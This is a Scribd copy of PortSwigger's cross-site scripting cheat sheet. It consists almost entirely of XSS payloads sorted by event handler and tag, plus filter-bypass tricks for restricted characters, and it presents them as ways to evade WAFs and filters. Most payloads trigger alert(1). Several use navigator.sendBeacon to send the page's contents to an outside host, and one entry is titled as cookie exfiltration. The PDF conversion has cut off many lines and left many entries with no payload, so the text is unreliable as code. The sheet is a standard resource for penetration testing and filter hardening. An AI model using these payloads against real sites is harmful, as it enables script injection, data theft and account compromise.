0% found this document useful (0 votes)

43 views75 pages

Cross-Site Scripting (XSS) Cheat Sheet

The Cross-Site Scripting (XSS) Cheat Sheet provides various vectors to bypass web application firewalls and filters, categorized by event and tag, with proof of concept examples included. It is regularly updated and serves as a resource for web security professionals. The document is part of a PortSwigger Research project and offers a downloadable PDF version.

Uploaded by

neweje7662

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

43 views75 pages

Cross-Site Scripting (XSS) Cheat Sheet

Uploaded by

neweje7662

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Academy home 

Web Security Academy >> Cross-site scripting >> Cheat sheet

Cross-site scripting (XSS) cheat sheet

This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or
and a proof of concept is included for every vector.
You can download a PDF version of the XSS cheat sheet.
This is a PortSwigger Research project. Follow us on Twitter to receive updates.
This cheat sheet is regularly updated in 2025. Last updated: Tue, 20 May 2025 08:36:22 +0000.

Table of contents

Event handlers

Copy tags to clipboard Copy events to clipboard Copy payloads to clipboard

onerror
All tags   All browsers
onfocus
custom tags Chrome
onfocus(autofocus)
a Firefox
onfocusin
abbr Safari
onfocusout
acronym
onformdata
address
onfullscreenchange
applet
ongesturechange
area
ongestureend
article
ongesturestart
aside  
onhashchange
di

Search Type: tag Search term: Search

Event handlers that do not require user interaction

onafterscriptexecute

Fires after script is executed

custom tags

<xss onafterscriptexecute=alert(1)><script>1</script>
Com
Copy Link

onanimationcancel

Fires when a CSS animation cancels

custom tags

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id

style="position:absolute;" onanimationcancel="print()"></xss>
Com
Copy Link

onanimationend

Fires when a CSS animation ends

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 1/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

custom tags

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>

Com
Copy Link

onanimationiteration

Fires when a CSS animation repeats

custom tags

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteratio

count:2" onanimationiteration="alert(1)"></xss>
Com
Copy Link

onanimationstart

Fires when a CSS animation starts

custom tags

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>

Com
Copy Link

onbeforeprint
Fires before the page is printed

body

<body onbeforeprint=console.log(1)>
Com
Copy Link

onbeforescriptexecute
Fires before script is executed

custom tags

<xss onbeforescriptexecute=alert(1)><script>1</script>
Com
Copy Link

onbeforeunload

Fires after if the url changes

body

<body onbeforeunload=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)>
Com
Copy Link

onbegin

Fires when a svg animation begins

animate

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Com
Copy Link

oncanplay

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 2/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Fires if the resource can be played

audio

<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through

video

<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>

Com
Copy Link

oncontentvisibilityautostatechange
Fires on all tags when content-visibility is set to auto

custom tags

<xss oncontentvisibilityautostatechange=alert(1) style=display:block;content-visibility:auto>

Com
Copy Link

oncontentvisibilityautostatechange(hidden)

Fires in a hidden input when content-visibility is set to auto

input

<input type=hidden oncontentvisibilityautostatechange=alert(1) style=content-visibility:auto>

Com
Copy Link

oncuechange

Fires when subtitle changes

track

<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1)

src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
Com
Copy Link

ondurationchange
Fires when duration changes

audio

<audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>

Com
Copy Link

onend
Fires when a svg animation ends

animate

<svg><animate onend=alert(1) attributeName=x dur=1s>

Com
Copy Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 3/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onended
Fires when the resource is finished playing

audio

<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onerror

Fires when the resource fails to load or causes an error

audio

<audio src/onerror=alert(1)>
Com
Copy Link

onfocus

Fires when the element has focus

<a id=x tabindex=1 onfocus=alert(1)></a>

Com
Copy Link

onfocus(autofocus)

Fires when a element has focus and the autofocus attribute is used to focus automatically.

custom tags

<xss onfocus=alert(1) autofocus tabindex=1>

Com
Copy Link

onfocusin

Fires when the element has focus

<a id=x tabindex=1 onfocusin=alert(1)></a>

Com
Copy Link

onhashchange

Fires if the hash changes

body

<body onhashchange="print()">
Com
Copy Link

onload

Fires when the element is loaded

body

<body onload=alert(1)>
Com
Copy Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 4/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onloadeddata
Fires when the first frame is loaded

audio

<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onloadedmetadata
Fires when the meta data is loaded

audio

<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onloadstart

Triggered video is loaded

video

<video onloadstart="alert(1)"><source></xss>
Com
Copy Link

onmessage

Fires when message event is received from a postMessage call

body

<body onmessage=print()>
Com
Copy Link

onpageshow
Fires when the page is shown

body

<body onpageshow=alert(1)>
Com
Copy Link

onplay
Fires when the resource is played

audio

<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onplaying
Fires the resource is playing

audio

<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 5/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Com
Copy Link

onpopstate
Fires when the history changes

body

<body onpopstate=print()>
Com
Copy Link

onprogress

Fires when the video/audio begins downloading

audio

<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>

Com
Copy Link

onrepeat

Fires when a svg animation repeats

animate

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />

Com
Copy Link

onresize

Fires when the window is resized

body

<body onresize="print()">
Com
Copy Link

onscroll
Fires when the page scrolls

body

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

Com
Copy Link

onscrollend
Fires when the scrolling to the end of the element

custom tags

<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><b

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br
<br><br><br><span id=x>test</span></xss>
Com
Copy Link

onscrollsnapchange
Fires at the end of a scrolling operation

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 6/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

address

<address onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-

align:center>1337</div></address>
Com
Copy Link

onscrollsnapchanging
Fires when the scroll position is snapping to a new point

custom tags

<style>.scroll-container { overflow-x: scroll; scroll-snap-type: x mandatory; display: flex; width: 300px; }

.scroll-item { flex: 0 0 500px; scroll-snap-align: start; } .scroll-item:first-child { animation: sample; anima
duration: 0.1s; } @keyframes sample { 100% { scroll-snap-align: none; } }</style><x class="scroll-container"
onscrollsnapchanging="alert(1)"> <xss class="scroll-item">Item 1</xss><xss class="scroll-item">Item 2</xss></xs
Com
Copy Link

onsuspend
Fires when the video/audio when the data loading is suspended

audio

<audio controls onsuspend=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>

Com
Copy Link

ontimeupdate
Fires when the timeline is changed

audio

<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

ontoggle

Fires when the details tag is expanded

details

<details ontoggle=alert(1) open>test</details>

Com
Copy Link

ontransitioncancel

Fires when a CSS transition cancels

custom tags

<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=print()></xss>

Com
Copy Link

ontransitionend

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 7/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Fires when a CSS transition ends

custom tags

<xss id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></xss>

Com
Copy Link

ontransitionrun
Fires when a CSS transition begins

custom tags

<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s"

ontransitionrun=print()></xss>
Com
Copy Link

ontransitionstart

Fires when a CSS transition starts

custom tags

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>

Com
Copy Link

onunhandledrejection

Fires when a promise isn't handled

body

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
Com
Copy Link

onunload
Fires when the page is unloaded

body

<body onunload=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)>
Com
Copy Link

onwaiting(loop)

Fires when the video/audio attempts to replay

audio

<audio controls loop muted autoplay onwaiting=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>

Com
Copy Link

onwebkitanimationend
Fires when a CSS animation ends

custom tags

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>

Com
Copy Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 8/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onwebkitanimationiteration

Fires when a CSS animation repeats

custom tags

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteratio

count:2" onwebkitanimationiteration="alert(1)"></xss>
Com
Copy Link

onwebkitanimationstart
Fires when a CSS animation starts

custom tags

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>

Com
Copy Link

onwebkitplaybacktargetavailabilitychanged
Fires when the availability of an AirPlay playback target changes

audio

<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>
Com
Copy Link

onwebkittransitionend
Fires when a CSS transition ends

custom tags

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>

Com
Copy Link

Event handlers that do require user interaction

onafterprint

Fires after the page is printed

body

<body onafterprint=alert(1)>
Com
Copy Link

onauxclick
Fires when right clicking or using the middle button of the mouse

input

<input onauxclick=alert(1)>
Com
Copy Link

onbeforecopy
Requires you copy a piece of text

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 9/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<a onbeforecopy="alert(1)" contenteditable>test</a>
Com
Copy Link

onbeforecut

Requires you cut a piece of text

<a onbeforecut="alert(1)" contenteditable>test</a>

Com
Copy Link

onbeforeinput

Fires when the value of the element is about to be modified

custom tags

<xss contenteditable onbeforeinput=alert(1)>test

Com
Copy Link

onbeforepaste
Fires at the end of a paste operation

custom tags

<xss onbeforepaste=alert(1)>XSS</xss>
Com
Copy Link

onbeforetoggle
Fires before the a popop element is toggled

custom tags

<button popovertarget=x>Click me</button><xss onbeforetoggle=alert(1) popover id=x>XSS</xss>

Com
Copy Link

onblur
Fires when an element loses focus

custom tags

<xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>

Com
Copy Link

oncancel
Fires when an a file upload is cancelled

input

<input type=file oncancel=alert(1)>

Com
Copy Link

onchange

Requires as change of value

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 10/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

input

<input onchange=alert(1) value=xss>

Com
Copy Link

onclick

Requires a click of the element

custom tags

<xss onclick="alert(1)" style=display:block>test</xss>

Com
Copy Link

onclose

Fires when a dialog is closed

dialog

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>

Com
Copy Link

oncontextmenu
Triggered when right clicking to show the context menu

custom tags

<xss oncontextmenu="alert(1)" style=display:block>test</xss>

Com
Copy Link

oncopy

Requires you copy a piece of text

custom tags

<xss oncopy=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test

Com
Copy Link

oncut

Requires you cut a piece of text

custom tags

<xss oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test

Com
Copy Link

ondblclick
Triggered when double clicking the element

custom tags

<xss ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</xss>

Com
Copy Link

ondrag

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 11/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Triggered dragging the element

custom tags

<xss draggable="true" ondrag="alert(1)" style=display:block>test</xss>

Com
Copy Link

ondragend

Triggered dragging is finished on the element

custom tags

<xss draggable="true" ondragend="alert(1)" style=display:block>test</xss>

Com
Copy Link

ondragenter
Requires a mouse drag

custom tags

<xss draggable="true" ondragenter="alert(1)" style=display:block>test</xss>

Com
Copy Link

ondragexit
Triggered when dragging the element

custom tags

<xss draggable="true" ondragexit="alert(1)" style=display:block>test</xss>

Com
Copy Link

ondragleave

Requires a mouse drag

custom tags

<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>

Com
Copy Link

ondragover

Triggered dragging over an element

custom tags

<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable style=display:block

here</xss>
Com
Copy Link

ondragstart

Requires a mouse drag

custom tags

<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>

Com
Copy Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 12/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

ondrop

Triggered dropping a draggable element

custom tags

<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable style=display:block>drop

here</xss>
Com
Copy Link

onfocusout

Fires when an element loses focus

custom tags

<xss onfocusout=alert(1) autofocus tabindex=1 style=display:block>test</xss><input value=clickme>

Com
Copy Link

onformdata

Triggered when a form is submitted

form

<form onformdata="alert(1)"><button>Click</button></form>
Com
Copy Link

onfullscreenchange

Fires when a video changes full screen status

video

<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>

Com
Copy Link

ongesturechange
Fires when the gesture is in progress and changes occur.

custom tags

<div ongesturechange=alert(1)>XSS</div>
Com
Copy Link

ongestureend

Fires when the gesture comes to an end.

custom tags

<div ongestureend=alert(1)>XSS</div>
Com
Copy Link

ongesturestart

Fires when multiple fingers touch the surface, initiating a new gesture.

custom tags

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 13/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Com
Copy Link

oninput
Requires as change of value

input

<input oninput=alert(1) value=xss>

Com
Copy Link

oninvalid

Requires a form submission with an element that does not satisfy its constraints such as a required attribute.

input

<form><input oninvalid=alert(1) required><input type=submit>

Com
Copy Link

onkeydown

Triggered when a key is pressed

custom tags

<xss onkeydown="alert(1)" contenteditable style=display:block>test</xss>

Com
Copy Link

onkeypress

Triggered when a key is pressed

custom tags

<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>

Com
Copy Link

onkeyup

Triggered when a key is released

custom tags

<xss onkeyup="alert(1)" contenteditable style=display:block>test</xss>

Com
Copy Link

onmousedown

Triggered when the mouse is pressed

custom tags

<xss onmousedown="alert(1)" style=display:block>test</xss>

Com
Copy Link

onmouseenter

Triggered when the mouse is hovered over the element

custom tags

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 14/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<xss onmouseenter="alert(1)" style=display:block>test</xss>
Com
Copy Link

onmouseleave

Triggered when the mouse is moved away from the element

custom tags

<xss onmouseleave="alert(1)" style=display:block>test</xss>

Com
Copy Link

onmousemove

Requires mouse movement

custom tags

<xss onmousemove="alert(1)" style=display:block>test</xss>

Com
Copy Link

onmouseout

Triggered when the mouse is moved away from the element

custom tags

<xss onmouseout="alert(1)" style=display:block>test</xss>

Com
Copy Link

onmouseover
Requires a hover over the element

custom tags

<xss onmouseover="alert(1)" style=display:block>test</xss>

Com
Copy Link

onmouseup
Triggered when the mouse button is released

custom tags

<xss onmouseup="alert(1)" style=display:block>test</xss>

Com
Copy Link

onmousewheel

Fires when the mousewheel scrolls

custom tags

<xss onmousewheel=alert(1) style=display:block>requires scrolling

Com
Copy Link

onmozfullscreenchange

Fires when a video changes full screen status

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 15/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

video

<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>

Com
Copy Link

onpagehide

Fires when the page is changed

body

<body onpagehide=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)>
Com
Copy Link

onpaste

Requires you paste a piece of text

<a onpaste="alert(1)" contenteditable>test</a>

Com
Copy Link

onpause

Requires clicking the element to pause

audio

<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onpointercancel
You need to make a selection and drag the text using a laptop touchpad.

custom tags

<xss onpointercancel=alert(1)>XSS</xss>
Com
Copy Link

onpointerdown
Fires when the mouse down

custom tags

<xss onpointerdown=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointerenter

Fires when the mouseenter

custom tags

<xss onpointerenter=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointerleave

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 16/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Fires when the mouseleave

custom tags

<xss onpointerleave=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointermove

Fires when the mouse move

custom tags

<xss onpointermove=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointerout

Fires when the mouse out

custom tags

<xss onpointerout=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointerover
Fires when the mouseover

custom tags

<xss onpointerover=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointerrawupdate

Fires when the pointer changes

custom tags

<xss onpointerrawupdate=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onpointerup

Fires when the mouse up

custom tags

<xss onpointerup=alert(1) style=display:block>XSS</xss>

Com
Copy Link

onratechange

Fires when the speed of the video changes

audio

<audio controls autoplay onratechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 17/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onreset

Requires a click

form

<form onreset=alert(1)><input type=reset>

Com
Copy Link

onsearch

Fires when a form is submitted and the input has a type attribute of search

input

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>

Com
Copy Link

onseeked

Requires clicking the element timeline

audio

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onseeking

Requires clicking the element timeline

audio

<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onselect

Requires you select text

input

<input onselect=alert(1) value="XSS" autofocus>

Com
Copy Link

onselectionchange

Fires when text selection is changed on the page

body

<body onselectionchange=alert(1)>select some text

Com
Copy Link

onselectstart
Fires when beginning a text selection

body

<body onselectstart=alert(1)>select some text

Com
Copy Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 18/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onshow

Fires context menu is shown

<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>

Com
Copy Link

onsubmit

Requires a form submission

form

<form onsubmit=alert(1)><input type=submit>

Com
Copy Link

ontoggle(popover)

Fires when the a popop element is toggled

custom tags

<button popovertarget=x>Click me</button><xss ontoggle=alert(1) popover id=x>XSS</xss>

Com
Copy Link

ontouchcancel

Fires when the select text, only mobile device

custom tags

<xss ontouchcancel=alert(1)>XSS</xss>
Com
Copy Link

ontouchend

Fires when the touch screen, only mobile device

body

<body ontouchend=alert(1)>
Com
Copy Link

ontouchmove
Fires when the touch screen and move, only mobile device

body

<body ontouchmove=alert(1)>
Com
Copy Link

ontouchstart
Fires when the touch screen, only mobile device

body

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 19/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Com
Copy Link

onvolumechange

Requires volume adjustment

audio

<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Com
Copy Link

onwaiting

Fires when the video/audio attempts to play

audio

<audio controls onwaiting=alert(1)><source src=x type=x></audio>

Com
Copy Link

onwebkitfullscreenchange

Fires when a video changes full screen status

video

<video controls src=validvideo.mp4 onwebkitfullscreenchange=alert(1)>

Com
Copy Link

onwebkitmouseforcechanged

Requires a click from a laptop touchpad.

custom tags

<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>
Com
Copy Link

onwebkitmouseforcedown

Requires a click from a laptop touchpad.

custom tags

<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
Com
Copy Link

onwebkitmouseforceup

Requires a click from a laptop touchpad.

custom tags

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
Com
Copy Link

onwebkitmouseforcewillbegin
Requires a click from a laptop touchpad.

custom tags

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 20/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
Com
Copy Link

onwebkitpresentationmodechanged

Fires when a video changes full screen status

video

<video controls src=validvideo.mp4 onwebkitpresentationmodechanged=alert(1)>

Com
Copy Link

onwebkitwillrevealbottom

Requires a click from a laptop touchpad.

custom tags

<xss onwebkitwillrevealbottom=alert(1)>XSS</xss>
Com
Copy Link

onwheel
Fires when you use the mouse wheel

body

<body onwheel=alert(1)>
Com
Copy Link

Consuming tags

Noembed consuming tag

<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>

Copy

Link

Noscript consuming tag

<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>

Copy

Link

Style consuming tag

<style><img title="</style><img src onerror=alert(1)>"></style>

Copy

Link

Script consuming tag

<script><img title="</script><img src onerror=alert(1)>"></script>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 21/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

iframe consuming tag

<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>

Copy

Link

xmp consuming tag

<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>

Copy

Link

textarea consuming tag

<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>

Copy

Link

noframes consuming tag

<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>

Copy

Link

Title consuming tag

<title><img title="</title><img src onerror=alert(1)>"></title>

Copy

Link

File upload attacks

Add blob to file object

<input type="file" id="fileInput" /><script>const fileInput = document.getElementById('fileInput');const

dataTransfer = new DataTransfer();const file = new File(['Hello world!'], 'hello.txt', {type:
'text/plain'});dataTransfer.items.add(file);fileInput.files = dataTransfer.files</script>

Copy

Link

Restricted characters

No parentheses using exception handling

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 22/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

No parentheses using exception handling no semi colons

Copy

Link

No parentheses using exception handling no semi colons using expressions

Copy

Link

No parentheses using exception handling and string eval on Chrome / Edge

Copy

Link

No parentheses using exception handling and string eval on Safari

Copy

Link

No parentheses using exception handling and object eval on Firefox

Copy

Link

No parentheses using exception handling and object eval on Firefox / Safari

<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 23/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

No parentheses using exception handling and location hash eval on all browsers

<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?

e:e.message</script>

Copy

Link

No parentheses, no quotes, no spaces using exception handling and location hash eval on all browsers

Copy

Link

No parentheses, no quotes, no spaces, no curly brackets using exception handling and location hash eval on all browsers

Copy

Link

No parentheses using ES6 hasInstance and instanceof with eval

Copy

Link

No parentheses using ES6 hasInstance and instanceof with eval without .

Copy

Link

No parentheses using location redirect

Copy

Link

No parentheses using location redirect no strings

Copy

Link

No parentheses using template strings

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 24/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
<script>alert`1`</script>

Copy

Link

No parentheses using template strings and location hash

Copy

Link

No parentheses or spaces, using template strings and location hash

Copy

Link

XSS cookie exfiltration without parentheses, backticks or quotes

Copy

Link

XSS without greater than

Copy

Link

XSS without greater using a HTML comment

Copy

Link

Array based destructuring using onerror

Copy

Link

Destructuring using onerror

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 25/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Destructuring using default values and onerror

Copy

Link

Vector using window.name

Copy

Link

Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using object literal

<script>window.name='javascript:alert(1)';function blah(){} blah(""+{a:location=name}+"")</script>

Copy

Link

Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using new class

<script>window.name='javascript:alert(1)';function blah(){} blah(""+new class b{toString=e=>location=name}+"")

</script>

Copy

Link

Script tag using only uppercase

Copy

Link

Script tag using only uppercase using JSFuck and inline

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 26/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

Copy

Link

window.name with onerror and throw

Copy

Link

location with onerror and throw

Copy

Link

SVG with onerror, throw and document.URL

<svg onload="throw top.onerror=eval,'/*'+URL">

Copy

Link

body with onerror, throw and location

<body onload="throw onerror=eval,'/*'+location">

Copy

Link

window.name with onerror and throw on Firefox

Copy

Link

SVG with onerror, throw and document.URL on Firefox

<svg onload="throw top.onerror=eval,{lineNumber:1,columnNumber:1,fileName:1,message:'/*'+URL}">

Copy

Link

body with onerror, throw and location on Firefox

<body onload="throw onerror=eval,{lineNumber:1,columnNumber:1,fileName:1,message:'/*'+location}">

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 27/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
ondevicemotion and URIError object

Copy

Link

ondeviceorientation and Error object

Copy

Link

ondeviceorientationabsolute and WebTransportError object

Copy

Link

onpagereveal and AggregateError object

Copy

Link

onpageswap and EvalError object

Copy

Link

onmessage and RangeError object

Copy

Link

onhashchange and Regex object

Copy

Link

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 28/75
5/24/25, 5:42 PM Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy

onscroll and ReferenceError object

Copy

Link

onscrollend and SyntaxError object

Copy

Link

onselect and TypeError object

<input value=x autofocus

onfocus="window.onselect=setTimeout;this.selectionStart=1;Event.prototype.toString=TypeError.prototype.toString
t.prototype.message='alert\x281\x29'">

Copy

Link

ontransitionstart / ontransitionend / ontransitionrun and Arrow function

<img/src/style=transition:0.1s
onerror="window.ontransitionstart=setTimeout;this.style.opacity=0;Event.prototype.toString=x=>'alert\x281\x29'"

Copy

Link

